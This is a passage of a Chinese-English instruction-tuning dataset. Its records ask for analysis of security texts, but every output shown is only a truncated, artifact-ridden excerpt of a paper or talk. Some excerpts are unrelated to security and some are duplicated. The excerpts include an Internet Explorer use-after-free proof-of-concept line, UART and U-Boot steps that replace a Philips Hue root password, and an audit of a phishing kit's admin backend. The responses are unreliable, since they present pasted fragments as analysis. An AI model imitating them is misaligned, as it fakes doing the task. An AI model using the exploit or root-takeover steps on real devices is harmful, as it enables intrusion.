instanceof运算符使格式如下 Object reference variable) instanceof (class/interface type) package ; public class instanceofTest { pu", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n这次的案件源自于很久以前外部 HC 单位对某司的钓鱼攻击文章中的源 码是 ASP 版本的钓鱼框架紫缘但是 ASP 源码中存在越权访问漏洞所以可以才 得以打到攻击者的后台在同段 IP 的扫描中根据中间件的版权信息可以获取同 类型的钓鱼管理后台详细内容在后续章节逐一介绍攻破思路和方法 一事件背景 企业邮箱收到了仿造 Outlook Web App 界面的钓鱼邮件应该是想要钓鱼 我们公司员工的邮箱账户攻击者 Outlook 钓鱼页面 二反制过程 渗透测试是红队人员对目标单位的攻击反制是目标单位的蓝队人员对红 队人员的反向渗透测试所以把这个反红队过程也叫做反制反制和渗透测试 一个正常网站没有差别除了对目标 IP 的信息收集漏洞挖掘外增加了同类系 统扩展扫描受控范围定位人头威胁情报的搜索通用行业的渗透讲究找出 漏洞防患于未然反制更多是对攻击者的一系列资产搜集然后挖出受控者和 攻击者的身份信息为主 信息收集 面对单个 IP 的信息收集常用的方法是敏感文件端口扫描弱口令测 试旁站域名这里有一个技巧主要的 C2 找不到后台的时候扫描端口再 做目录扫描是可以有几率得到其他后台信息的攻击者一样会做应用和管理后 台分离访问图中的 2301 端口就是可疑端口下图是端口扫描的结果 弱口令测试漏洞挖掘 除了 SSH 和 RDP 暴力破解外这些服务性质的端口是可以尝试的扫描出 来的 21 服务类端口 FTP 做口令破解可以看到 FTP 有匿名访问但登录之后访 问不到 WEB 文件 祭出 dirsearch 对后台做目录扫描, 对 80 端口扫描不出敏感文件的时候换 到不同端口再尝试扫描网页文件这次切换的是 2301 端口敏感文件扫描得到后 台页面http://xxx.xxx.xxx.xxx:2301/admin.asp其中比较有用的信息 MANAGEQQ 管理系统紫缘設計工作室(WWW.CKZZ.NET) 扫描出来的后台已经暴露出钓鱼程序名称版本年限端口源码里面也 有特别的字符在百度网盘搜索引擎搜索能得到很多结果 花时间在找源码的 过程比较长复现文章时网盘搜索已经搜索不出来了仅存的几个 ASP 源码已 经取消分享以下是我在百度网盘搜索引擎里搜索得到的紫缘钓鱼源码架构截 图 搭建起来版本号是 20150502 的跟目标源码长得不太一样但是测试的 几个文件都是跟目标站一样的后台样式截图如下 ASP 代码审计跟审计其他脚本语言区别不大我觉得小语种代码审计虽然 没有编辑器可以很方便调试输出结果但是利用输出语句和条件判断终止语 句能跑起来就可以实现对小语种代码审计因为调试器起到的作用就是断点和 输出变量的作用而已熟悉原理一样可以实现调试和分析 ASP 调试和执行 SQL 语句的方法说明 输出语句 Response.Write \"\"&username&\"' ------ '\"&password&\"\" 数据库操作 set rs=server.CreateObject(\"adodb.recordset\") 建立一个数据集 set rs=server.CreateObject(\"adodb.recordset\") 建立一个数据集的实 例 rs.open ...... 打开一个记录集 rs.addnew 添加记录到数据表末端 rs.update 更新数据表记录 这款 ASP 钓鱼源码比较简单没有上传命令执行类漏洞可以直接利用 XSS 之前已经黑盒子试过了没有反馈感觉应该是做了过滤况且已经扫到后 台地址拿到源码后先看看有没有机会可以越权进后台页面拿到受控者的数 据 从配置文件开始找起在 WEB 根目录里的 Web.box 文件 89 行可以看到 访问 2301 端口是指向管理后台目录\\wwwroot\\_Manager_##_#@# # 设置 NetBox.HttpServer 对象 Set http3 = CreateObject(\"NetBox.HttpServer\") # 监听 2301 端口 If http3.Create(\"\", \"2301\") = 0 Then # 添加访问目录 Set www = http3.AddHost(\"\", \"\\wwwroot\\_Manager_##_#@#\") www.EnableScript = true www.AddDefault \"ckzz_ec.asp\" http3.Start end if 搜索紫緣設計工作室(WWW.CKZZ.NET) 在 wwwroot\\_manager_##_#@#\\index.asp 找到了后台登录验证页面自己下载一 个 netbox 加载 web.box 就可以脱离紫缘已经封装好的源码了, 因为配置参数都 是默认有的后台的界面比较少没找到可以不登录就直接访问的页面遂放 弃 SQL 注入漏洞挖掘 源码很多", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nNeedle in A Haystack: Catch Multiple Zero-days Using Sandbox Qi Li Security Development Engineer Quan Jin Vulnerability Mining and Exploiting Engineer 2019-5-30 About Us Qi Li (@leeqwind) 360 Core Security Advanced Threat Automation Team Security Development Engineer Quan Jin (@jq0904) 360 Core Security Advanced Threat Automation Team Vulnerability Mining and Exploiting Engineer  Advanced Threat Automation and Sandbox  Find in-the-wild zero-days using Sandbox Outline Cyber Attacks are Everywhere The five in-the-wild exploiting zero-day attacks we captured up to now CVE-2018-15982 Catch an international cyber-attack on a government agency in the world with a new Flash zero-day (CVE- 2018-15982). 2018-11 CVE-2018-8174 The first to capture a new APT MS Office attack using a browser zero-day (CVE-2018-8174) in the world, w h ich affects the latest version of Internet explorer and applications using the core of IE at that time. 2018-04 2018-06 CVE-2018-5002 The first company to catch an in-the-wild Flash zero- day (CVE-2018-5002) worldwidely. The vulnerability affects Adobe Flash Player 29.0.0.171 and all versions below. 2017-12 CVE-2018-0802 The first in the world to catch Nightmare Equation II (CVE-2018-0802) zero-day, which is the first in-the- wild zero-day Microsoft fixed in 2018. CVE-2017-11826 Capture an in-the-wild zero-day (CVE-2017-11826) exclusively and globally. The first Office zero-day attack caught by Chinese security vendor. 2017-09 Cyber Attacks are Everywhere 1 10 100 1000 10000 100000 1000000 doc docm docx eml html hwp msi nsis pdf ppt pptm pptx rtf swf vbs xls xlsm xlsx exe dll others Flash HWP IE Kernel Office PDF CVE-2012-0158 CVE-2015-1641 CVE-2015-1726 CVE-2015-2545 CVE-2016-7255 CVE-2017-11882 CVE-2017-8570 CVE-2018-0798 CVE-2018-0802 CVE-2018-4878 Statistics for some of the N-day exploits we detected from March 2018 to March 2019 Partial file type classification Vulnerability module classification Partial vulnerability count Advanced Threat Auto", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nBRAIN GAMES Make your own Biofeedback Video Game Ne0nRa1n That Strange Little 'Brain Girl' Joe Grand aka Kingpin www.kingpinempire.com Biofeedback The definition of biofeedback The technique of using monitoring devices to obtain information about an involuntary function of the central or autonomic nervous system, such as body temperature or blood pressure, in order to gain some voluntary control over the function. Using biofeedback, individuals can be trained to respond to abnormal measurements in involuntary function with specific therapeutic actions, such as muscle relaxation, meditation, or changing breathing patterns. Biofeedback has been used to treat medical conditions such as hypertension and chronic anxiety. The American Heritage Science Dictionary Published by Houghton Mifflin Company. All rights reserved.,  2002 by Houghton Mifflin Company. Biofeedback devices are devices that give feedback regarding our biology. As a broad generalization, MRI's, X-rays, and even something as simple as a scale that measure your weight and a thermometer that you measure your temperature can all be considered biofeedback devices because they all provide information about the state of your bodily workings. More traditionally though, the term \"biofeedback device\" is usually used to describe equipment that shows in real-time, as it's happening,the physiological effects of our thoughts, emotions, attitudes, perceptions, and mental processes. So, different biofeedback devices would measure different things in your body. How does biofeedback work? Scientists are not able to explain exactly how or why biofeedback works. However, there does seem to be at least one common thread: most people who benefit from biofeedback have conditions that are brought on or made worse by stress. In the late 1960s, when the term biofeedback was coined many scientists were looking forward to the day when biofeedback would give us such a major degree of control over our bodies that one day in the brigh", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n# T1135-win-网络共享发现 ## 来自ATT&CK的描述 网络通常包含共享的网络驱动器和文件夹使用户可以通过网络访问不同系统上的文件目录 Windows Windows网络上的文件共享通过SMB协议进行 Net可用于使用Net view\\remote system命令查询远程系统中的可用共享驱动器它还可用于使用网络共享查询本地系统上的共享驱动器 攻击者可能会寻找在远程系统上共享的文件夹和驱动器作为识别信息源的一种方法以收集作为攻击的前兆并识别可能感兴趣的横向移动系统 Mac 在Mac上可以使用df-aH命令查看本地安装的共享 云 云虚拟网络可能包含远程网络共享或文件存储服务攻击者在获得对系统的访问权限后可以访问这些服务例如AWSGCP和Azure支持创建网络文件系统NFS共享和服务器消息块SMB共享这些共享可以映射到端点或基于云的系统上 ## 测试案例 windows 本地执行net view相关命令 ## 检测日志 windows 安全日志 ## 测试复现 ```dos C:\\Windows\\system32>net view \\\\OWA2010SP3.0day.org 在 \\\\OWA2010SP3.0day.org 的共享资源 共享名 类型 使用为 注释 ------------------------------------------------------------------------------- Address Disk \"Access to address objects\" CertEnroll Disk Active Directory 证书服务共享 ExchangeOAB Disk OAB Distribution share GroupMetrics Disk 邮件提示组度量标准发布点 NETLOGON Disk Logon server share SYSVOL Disk Logon server share 命令成功完成 ``` ## 测试留痕 windows 安全日志 ## 检测规则/思路 ### sigma规则 ```yml title: windows 网络共享发现windows server 2016检测 description: windows server 2016windows server 2012域环境 tags: T1135 status: experimental author: 12306Bro logsource: product: windows service: security detection: selection1: EventID: 4688 #已创建新的进程 Newprocessname: 'C:\\Windows\\System32\\net.exe' #进程信息>新进程名称 Creatorprocessname: 'C:\\windows\\system32\\cmd.exe' #进程信息>创建者进程名称 Processcommandline: net view \\\\* #进程信息>进程命令行 selection2: EventID: 4703 #已调整用户权利注意此事件在windows server 2016以上系统启用 selection3: EventID: 5158 #Windows 筛选平台已允许绑定本地端口注意源端口协议 selection4: EventID: 5156 #Windows 筛选平台已允许连接 Direction: 出站 #网络信息>方向出站 Sourceaddress: * #发起查询主机IP地址 Sourceport: * #和5158事件源端口一致 Targetaddress: * #目标IP地址 Targetport: 445 #目标端口 Agreement: * #协议协议和5158一致 selection5: EventID: 4689 #已退出进程 Processname: 'C:\\Windows\\System32\\net.exe' #进程信息>进程名 timeframe: last 5s #可根据实际情况调整 condition: all of them level: medium ``` ```yml title: windows 网络共享发现windows server 2012检测 description: windows server 2016windows server 2012域环境 tags: T1135 status: experimental author: 12306Bro logsource: product: windows service: security detection: s", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCrowd Security Intelligence @colbymoore @patrickwardle syn.ac/defc0n22 download slides optical implanting this surgery who we are we source a global contingent vetted security experts worldwide and pay them on an incentivized basis to discover security vulnerabilities in our customers web apps, mobile apps, and infrastructure endpoints. @patrickwardle-- NASA,-NSA,-VRL,-Synack @colbymoore VRL,-Synack R & D team always looking for more experts! an outline overview root access vulnerabilities implant an overview dropcam is a cloud-based Wi-Fi video monitoring service with free live streaming, two-way talk and remote viewing that makes it easy to stay connected with places, people and pets, no matter where you are. -dropcam.com night vision two-way talk intelligent alerts cloud recording setup & configuration or wifi setup } completed setup a target popular++ appealing locations powerful capabilities [for Google] to gain a bigger foothold in the fast growing market for connected devices in the home -forbes.com rooting a dropcam probing some portz breakout board (FTDI serial to USB) serial connection (pin 3 & 4) exposed 3.3v UART and action! $ screen /dev/tty.usbserial-A603NJ6C 115200 [0.000000] Linux version 2.6.38.8 [0.000000] CPU: ARMv6-compatible processor [4117b365] [0.000000] CPU: VIPT nonaliasing data cache [0.544192] Initializing Crown Royal Dropcam board (revision 2) ... ! .::. .o0WMMMMMNOc. lk, dWMMMMNXNMMMMWl .NMc dMMMMd. .kMMMMl .oOXNX0kWMc cX0xXNo .oOXNX0d' .0XxxKNNKx; :kKNNKx. .lOXNNKx, :XXxKNXOldKNNKd. KMMMO KMMM0 lWNd;',lXMMc oMMo'..dWNo,',oXWx .WMWk;',c0M0. .KMO:'':; ;NWx;',cKMK. lMMx'.oWMX;.'0MO OMMMW; cWMMMx .MM: .WMc oMX 'MM, 'WM;.WMd XMo kM0 KMx .WMd lMM' .XMo cMX .0MMMM0..cKMMMMk 0M0' .dMMc oMX .XMk' .xMX..WMK; .lWW, cWW: dMX, .oMMd lMM' .XMo cMX :XM0:dNMMMMO; oNMNKXMNWMc oMX .dNMNKXMNx. .WMWMNKXMWO' ;0WWKKWN, cKMNKXWWWMd lMM' .XMo cMK ;.0MMMMO, .;:;. ';. .;. .;:;. .WMo.,:;'. .,::,. .;:;'..;. .;; ,;. .;. 'ONx' .WM: .. ! Ambarella login: booting to pas", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nWho Cares Who Cares About IPv6? About IPv6? Sam Bowne Sam Bowne City College San Francisco City College San Francisco Part I Part I Who Cares? Who Cares? IPv4 Addresses: 32 Bits IPv4 Addresses: 32 Bits IPv4 address: IPv4 address: 192.168.1.10 192.168.1.10 Four bytes Four bytes In Binary: In Binary: 11000000 10101000 00000001 00001010 11000000 10101000 00000001 00001010 232 total addresses 232 total addresses 4 billion 4 billion Are you kidding? There are 7 billion Are you kidding? There are 7 billion people, they each need people, they each need iPads iPads, cell phones, , cell phones, Google brain chip implants, etc Google brain chip implants, etc  IPv6 Addresses: 128 Bits IPv6 Addresses: 128 Bits IPv6 address IPv6 address 2001:05c0:1000:000b:0000:0000:0000:66fb 2001:05c0:1000:000b:0000:0000:0000:66fb Omitting unnecessary zeroes; Omitting unnecessary zeroes; 2001:5c0:1000:b::66fb 2001:5c0:1000:b::66fb Eight fields, each 16 bits long Eight fields, each 16 bits long 4 hexadecimal characters 4 hexadecimal characters 2128 total addresses 2128 total addresses 256 billion 256 billion billion billion billion billion billion billion Enough for a while Enough for a while IPv4 Exhaustion As of 6-30-2010, 16 \"/8 address ranges\" remain Each /8 has 16.8 Million Addresses 205 /8s already allocated 35 Reserved for special uses From link Defcon-talk 3 The End is Near The End of the World No Reprieve IANA will not re-purpose class D or E addresses for general use People who ask for IPv4 addresses after exhaustion will not get them Hoarding, scalping, and simple direct sale of IPv4 addresses will begin soon From link From link Defcon Defcon--talk 4 talk 4 Federal IPv6 Transition Timeline From Cisco (link Defcon-talk 2) Summary Summary of Part I of Part I IPv4 is Full IPv4 is Full Image from zinyaw.files.wordpress.com Part II Part II What Now? What Now? Methods of IPv6 Migration Ignore IPv6: Stay on IPv4-only Gateways: Devices that convert IPv6 to IPv4 Tunnel IPv6 over IPv4 Dual-Stac", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n探索学习并使用 Go 语言的简洁 而全面的指导手册 摘自 Hugo 创立者 Steven Francia 为本书写的序 这本权威的书为所有想要开始学习 Go 语言的人提供了一站式的指引 Sam ZaydelRackTop Systems 写得太好了完整介绍了Go语言 强烈推荐 Adam McKaySUEZ 这本书把 Go 语言不寻常的部分讲 得通俗易懂 Alex VidalAtlassian 的 HipChat 团队 Go 语言实战 语言实战 Go 分类建议计算机程序设计 Go 语言 人民邮电出版社网址www.ptpress.com.cn 美术编辑董志桢 Go Go IN ACTION 即便不处理类似可扩展的 Web 并发或者实时性能等复杂的系统 编程问题应用程序开发也是一件非常困难的事情尽管使用一些工 具和框架也可以解决这些常见的问题但 Go 语言却以一种更加自然 且高效的方式正确处理了这类问题由谷歌公司开发的 Go 语言为 在基础设施中非常依赖高性能服务的初创公司和大企业提供了足够的 能力 本书目标读者是已经有一定其他编程语言经验想要开始学习 Go 语言或者更深入了解 Go 语言及其内部机制的中级开发者本书 会提供一个专注全面且符合习惯的视角本书关注 Go 语言的规范 和实现涉及的内容包括语法Go 的类型系统并发通道和测试 等主题 本书主要内容  Go 语言规范和实现  Go 语言的类型系统  Go 语言的数据结构的内部实现  测试和基准测试 本书假设读者是熟练使用其他语言如 JavaRubyPython C# 或者 C++的开发者 William Kennedy 是一位熟练的软件开发者也是博客 GoingGo. Net 的作者Brian Ketelsen 和 Erik St. Martin 是全球 Go 语言大会 GopherCon 的组织者也是 Go 语言框架 Skynet 的联合作者 语言实战 美著 李兆海译 谢孟军审校 WilliamKennedy BrianKetelsen ErikSt.Martin FM44535Go语言实战.indd 1-3 17-1-19 下午2:38 探索学习并使用 Go 语言的简洁 而全面的指导手册 摘自 Hugo 创立者 Steven Francia 为本书写的序 这本权威的书为所有想要开始学习 Go 语言的人提供了一站式的指引 Sam ZaydelRackTop Systems 写得太好了完整介绍了Go语言 强烈推荐 Adam McKaySUEZ 这本书把 Go 语言不寻常的部分讲 得通俗易懂 Alex VidalAtlassian 的 HipChat 团队 Go 语言实战 语言实战 Go 分类建议计算机程序设计 Go 语言 人民邮电出版社网址www.ptpress.com.cn 美术编辑董志桢 Go Go IN ACTION 即便不处理类似可扩展的 Web 并发或者实时性能等复杂的系统 编程问题应用程序开发也是一件非常困难的事情尽管使用一些工 具和框架也可以解决这些常见的问题但 Go 语言却以一种更加自然 且高效的方式正确处理了这类问题由谷歌公司开发的 Go 语言为 在基础设施中非常依赖高性能服务的初创公司和大企业提供了足够的 能力 本书目标读者是已经有一定其他编程语言经验想要开始学习 Go 语言或者更深入了解 Go 语言及其内部机制的中级开发者本书 会提供一个专注全面且符合习惯的视角本书关注 Go 语言的规范 和实现涉及的内容包括语法Go 的类型系统并发通道和测试 等主题 本书主要内容  Go 语言规范和实现  Go 语言的类型系统  Go 语言的数据结构的内部实现  测试和基准测试 本书假设读者是熟练使用其他语言如 JavaRubyPython C# 或者 C++的开发者 William Kennedy 是一位熟练的软件开发者也是博客 GoingGo. Net 的作者Brian Ketelsen 和 Erik St. Martin 是全球 Go 语言大会 GopherCon 的组织者也是 Go 语言框架 Skynet 的联合作者 语言实战 美著 李兆海译 谢孟军审校 WilliamKennedy BrianKetelsen ErikSt.Martin FM44535Go语言实战.indd 1-3 17-1-19 下午2:38 Go IN ACTION 语言实战 Go 人 民 邮 电 出 版 社 美 著 李兆海 译 谢孟军 审校 William Kennedy Brian Ketelsen Erik St. Martin FM44535Go语言实战.indd 4 17-1-19 下午2:36  著 [美] William Kennedy Brian Ketelsen Erik ", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\n演讲人 2 0 1 8  Swan业余漏洞挖掘爱好者  HeigeWeb一哥二进制新手  Hui GaoMSRC top 100一姐  业余时间搞下二进制  找找那些难以利用无实战意义的漏洞  希望是非灌水性质因为Adobe本身门槛略低  避开热点区域  不撞洞不给其它有KPI要求的团队添麻烦  源于2014年的思路  2014年5月29日我们发现了一个古天乐般平平无奇的IE漏洞CVE-2014-1792  POC非常简单  72字节的Use-After-Free漏洞  <!doctype><body onload=x.parentNode.applyElement(x)><body id=x><marquee> 启发  一开始无法重现  反复试验后发现拖拽文件入浏览器可触发UAF在mshtml!CDragDropManager::DragOver+0x1f9  Fuzzer确实有乱发送鼠标键盘事件的模块  复盘发现情况寻找原因  结论不知道咋找到的摊手  类似的还有CVE-2014-1791等  有交互的漏洞似乎符合我们的期望  小众难找难重现  Fuzz效率低性价比堪忧鲜有人做  没有现成工具一切需要从头搭建  能找到各种搞不清楚原因的漏洞 结论与立项原因  简单的说  以前我们关注触发的内容现在我们尝试触发的姿势  有交互要处理没有交互制造交互也要处理  收集会引起交互的PDF元素  JS command  引起错误及安全等级相关的元素  发送会引起交互的事件  JS层面  用户输入层面  模拟用户响应 思路  app.execMenuItem(\"xx\");  76 actions: GoToPage, FitPage, TwoColumns   app.alert(xx)  console.show();  this.mailDoc(true);  this.mailForm(true);  this.print(xx)  this.saveAs(xx)  this.insertPages(xx)  app.launchURL(xx)   引起交互的JS 引起一些交互  引起一些可以被Adobe Reader容忍的错误  无效的参数  不存在的对象  安全等级警告   引起一些错误 引起一些错误  键盘事件  随机字符输入圆周率映射到字符  快捷键与快捷键组合Ctrl+H, Ctrl+LAlt+F4  鼠标事件  鼠标移动mouse_event()  点击与拖拽左键右键鼠标压下鼠标放起  滚轮事件滚动方向点击  系统事件与其它 用户输入层面  不同的提示信息对话框  不同的按钮确定/取消/是/否  需要输入的对话框  页面跳转跳转到有效页面跳转到无效页面取消跳转  标签与选项选择单选框复选框确认/应用/取消  翻页与缩放  其它动作  全屏打印允许/不允许取消记住选择  关闭应用程序正常退出强制退出取消退出 进一步细分  输入随机但可以记录随机种子来回放  记录系统环境内存显示设置等  记录应用程序初始与结束配置窗口大小等  记录输入时间间隔  记录虚拟机与物理机负载  记录网络响应情况 可靠重现的条件  生成混合有各种因素的PDF样本  打开后根据对话框情况模拟用户响应  没有交互时制造一些交互事件  后台对每次响应与主动事件进行记录  等待并观察一段时间看是否有crash  重复第一步 整合在一起  气宗  从头开始构造文件  通过JS构造页面及页面元素  剑宗  找个模板替换掉JS  其它不知道什么宗  Dummy fuzzing 然后我们谈谈样本生成  敝厂特拉维夫分厂有人在做气宗的活  我们对PDF文件格式吃得不是很透(谦虚脸)  黑哥对气剑宗的屁话一直耿耿于怀  黑哥对气剑宗的屁话一直耿耿于怀  黑哥对气剑宗的屁话一直耿耿于怀 我们向剑宗低了头  爬docs.adobe.com收集JS API素材  文档不全的用枚举来搜索一次见下一页 佛系Fuzzing构建 function obj(o){ for(i in o){ console.println(o[i]); } } obj(this);  爬docs.adobe.com收集JS API素材  文档不全的用枚举来搜索一次  从基础文件中搜集objects名 佛系Fuzzing构建 6 0 obj << /Type /OCG /Name (Text) >> endobj 7 0 obj << /Type /OCG /Name (BigRect) >>endobj 8 0 obj << /Type /OCG /Name (SmallRect) >> endobj 21 0 obj << /FT /Ch /Parent 10 0 R /Ff 154543304", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\ntraceroute === 显示数据包到主机间的路径 ## 补充说明 **traceroute命令** 用于追踪数据包在网络上的传输时的全部路径它默认发送的数据包大小是40字节 通过traceroute我们可以知道信息从你的计算机到互联网另一端的主机是走的什么路径当然每次数据包由某一同样的出发点source到达某一同样的目的地(destination)走的路径可能会不一样但基本上来说大部分时候所走的路由是相同的 traceroute通过发送小的数据包到目的设备直到其返回来测量其需要多长时间一条路径上的每个设备traceroute要测3次输出结果中包括每次测试的时间(ms)和设备的名称如有的话及其ip地址 ### 语法 ```shell traceroute(选项)(参数) ``` ### 选项 ```shell -d使用Socket层级的排错功能 -f<存活数值>设置第一个检测数据包的存活数值TTL的大小 -F设置勿离断位 -g<网关>设置来源路由网关最多可设置8个 -i<网络界面>使用指定的网络界面送出数据包 -I使用ICMP回应取代UDP资料信息 -m<存活数值>设置检测数据包的最大存活数值TTL的大小 -n直接使用IP地址而非主机名称 -p<通信端口>设置UDP传输协议的通信端口 -r忽略普通的Routing Table直接将数据包送到远端主机上 -s<来源地址>设置本地主机送出数据包的IP地址 -t<服务类型>设置检测数据包的TOS数值 -v详细显示指令的执行过程 -w<超时秒数>设置等待远端主机回报的时间 -x开启或关闭数据包的正确性检验 ``` ### 参数 主机指定目的主机IP地址或主机名 ### 实例 ```shell traceroute www.58.com traceroute to www.58.com (211.151.111.30), 30 hops max, 40 byte packets 1 unknown (192.168.2.1) 3.453 ms 3.801 ms 3.937 ms 2 221.6.45.33 (221.6.45.33) 7.768 ms 7.816 ms 7.840 ms 3 221.6.0.233 (221.6.0.233) 13.784 ms 13.827 ms 221.6.9.81 (221.6.9.81) 9.758 ms 4 221.6.2.169 (221.6.2.169) 11.777 ms 122.96.66.13 (122.96.66.13) 34.952 ms 221.6.2.53 (221.6.2.53) 41.372 ms 5 219.158.96.149 (219.158.96.149) 39.167 ms 39.210 ms 39.238 ms 6 123.126.0.194 (123.126.0.194) 37.270 ms 123.126.0.66 (123.126.0.66) 37.163 ms 37.441 ms 7 124.65.57.26 (124.65.57.26) 42.787 ms 42.799 ms 42.809 ms 8 61.148.146.210 (61.148.146.210) 30.176 ms 61.148.154.98 (61.148.154.98) 32.613 ms 32.675 ms 9 202.106.42.102 (202.106.42.102) 44.563 ms 44.600 ms 44.627 ms 10 210.77.139.150 (210.77.139.150) 53.302 ms 53.233 ms 53.032 ms 11 211.151.104.6 (211.151.104.6) 39.585 ms 39.502 ms 39.598 ms 12 211.151.111.30 (211.151.111.30) 35.161 ms 35.938 ms 36.005 ms ``` 记录按序列号从1开始每个纪录就是一跳 每跳表示一个网关我们看到每行有三个时间单位是ms其实就是`-q`的默认参数探测数据包向每个网关发送三个数据包后网关响应后返回的时间如果用`traceroute -q 4 www.58.com`表示向每个网关发送4个数据包 有时我们traceroute一台主机时会看到有一些行是以星号表示的出现这样的情况可能是防火墙封掉了ICMP的返回信息所以我们得不到什么相关的数据包返回数据 有时我们在某一网关处延时比较长有可能是某台网关比较阻塞也可能是物理设备本身的原因当然如果某台DNS出现问题时不能解析主机名域名时也会 有延时长的现象您可以加`-n`参数来避免DNS解析以IP格式输出数据", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nCyCraft Proprietary and Confidential Information Operation Chimera - APT Operation Targets Semiconductor Vendors C h u n g - K u a n C h e n , I n n d y L i n , S h a n g - D e J i a n g CyCraft Proprietary and Confidential Information Whoami C.K Chen  Senior Researcher at CyCraft  Retired CTF Player  BambooFox Founder  HITCON/HITB Review Board  CHROOT member SHANG-DE Jiang  Security Researcher at CyCraft  UCCU Hacker Co-Founder Inndy Lin  Security Researcher at CyCraft  Reverse Engineering Hobbyist  Presented in HITCON, ROOTCON CyCraft CyCraft is an AI company that forges the future of cybersecurity resilience through autonomous systems and human-AI collaboration. CyCraft in MITRE ATT&CK Evaluation CyCraft Takes Significant Alerting Lead in MITRE ATT&CK Evaluations Latest Round Outline  Introduction  Case Study  A Company  B Company  Threat Actor's Digital Arsenal  Conclusion CyCraft Proprietary and Confidential Information Critical Incidents in Taiwan's Supply Chain/Critical Infrastructure ASUS Supply Chain Attack TSMC Ransomware ColdLock against CPC CyCraft Proprietary and Confidential Information Taiwan's Importance in the Semiconductor Landscape With decades of development, Taiwan has established itself as a leading player in the semiconductor industry. Some of the well-known leaders include TSMC and MTK  Taiwan is set to become the largest and fastest-growing semiconductor equipment maker in the world by increasing by 21.1 percent to reach US$12.31 billion. -Taiwan News, July 2019 Cyberattack to semiconductor vendors  Just like the TSMC ransomware, a cyberattack against semiconductor could potentially  Seriously impact Taiwans economy  Affect the entire global supply chain  In this report, we will show how IT attacks on semiconductor vendors can be just as dangerous as an OT attack.  Attack to OT - production line halt, immediately damage  Attack to IT - leak important intelligence property, long-term damage Large-scale APT attacks on Semiconductor Industry Be", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nUrban/Metropolitan Area i December 2006 Tactical Interoperable Communications Scorecards Tactical Interoperable Communications Scorecards Tactical Interoperable Communications Scorecards Tactical Interoperable Communications Scorecards Tactical Interoperable Communications Scorecards Summary Report and Findings Summary Report and Findings Summary Report and Findings Summary Report and Findings January 2007 January 2007 January 2007 January 2007 Urban/Metropolitan Area ii January 2007 Tactical Interoperable Communications Scorecards TTTTABLE OF CONTENTS ABLE OF CONTENTS ABLE OF CONTENTS ABLE OF CONTENTS TABLE OF CONTENTS TABLE OF CONTENTS TABLE OF CONTENTS TABLE OF CONTENTS................................ ................................ ................................ ................................................................ ................................ ................................ ................................................................ ................................ ................................ ..................................................... ..................... ..................... .....................IIIIIIII EXECUTIVE SUMMARY EXECUTIVE SUMMARY EXECUTIVE SUMMARY EXECUTIVE SUMMARY ................................ ................................ ................................ ................................................................ ................................ ................................ ................................................................ ................................ ................................ .................................................. .................. .................. ..................III IIIIII III INTRODUCTION INTRODUCTION INTRODUCTION INTRODUCTION................................ ................................ ................................ ................................................................ ................................ ...........................", "category": "text_analysis", "source": "security_papers"}
{"instruction": "请分析这段安全相关的文本内容", "input": "", "output": "安全文本分析：\n\nPhilips Hue Bridge2.1 获取设备 root 权限 基础信息收集 设备介绍 Philips HUE Bridge 桥接器在现有 HUE Bridge 桥接器的基础上升级为支持 HomeKit这款 HUE Bridge 桥接器让你可在 iPhoneiPad 或 iPod touch 上 通过 Hue app 控制自己的各种 Hue 产品只需安装好 HUE Bridge 桥接器 并将 app 下载到 iOS 设备上便可开始打造定制化的照明系统 (参考: https://www.apple.com.cn/shop/product/HPY82CH/A) 设备版本 philips Hue Bridge 2.1 设备接入 直接接入支持 DHCP 的设备中即可, 可以当作 DHCP Client 来直接获取 IP,然后 通过管理后台以及端口扫描的方式获取到设备的 Mac 地址, Mac 地址有标识是 Philips 的设备. Nmap scan report for 192.168.1.9 Host is up (0.0027s latency). Not shown: 998 closed ports PORT STATE SERVICE 80/tcp open http 8080/tcp open http-proxy MAC Address: XXXXXXXXXXXXX (Philips Lighting BV) 获取 Root 权限 UART 接口测试 根据如下线序进行连接(小三角处为 PIN1): 连接好 UART, 波特率 115200,使用 minicom 进行调试: minicom -D /dev/<serial> -b 115200 测试乱码, 这里由于我使用的是 CH340G 的模块进行 uart 调试, 后边通过查询 网上的资料, 该类型调试口需要使用 FT232RL 进行调试, 于是更换 FT232RL 京东上买一个: 更换后即可看到正常显示: 这里因为板子使用的是冷启动, 也就是在连接了 TX 之后, 板子不会启动, 因此 在引导加载程序启动之前保持未连接状态 如果想中断引导加载, 并且进入 U-boot 控制台的话,需要在加载 U-boot 的时 候, 连接 SEU 的 2 个接口到 flash 右边的这个触点上, 这样的话就可以使得引 导加载程序无法从 NAND 读取内核映像, 从而报错进入到 U-boot 控制台, 具体 操作方法如下: 在设备接入电源约 2-3 秒后, 通过该方法就可以进入到 U-Boot 中,printenv 打 印一下环境变量, 发现有 security 字段, 它为 root 的原始密码 此时通过 mkpasswd 生成一个 toor 的密码 重新设置一下 security 值, 然后保存环境变量, 重新启动, 即可替换掉原有的 系统口令, 命令如下 ath> setenv security '$5$wbgtEC1iF$ugIfQUoE7SNg4mplDI/7xdfLC7jXoMAkupeMsm1 0hY9' ath> saveenv ath> reset 获取本地 Root 权限: 打包固件: tar -zcvf /tmp/rom.tar.gz /rom/ 通过 scp 传输:", "category": "text_analysis", "source": "security_papers"}
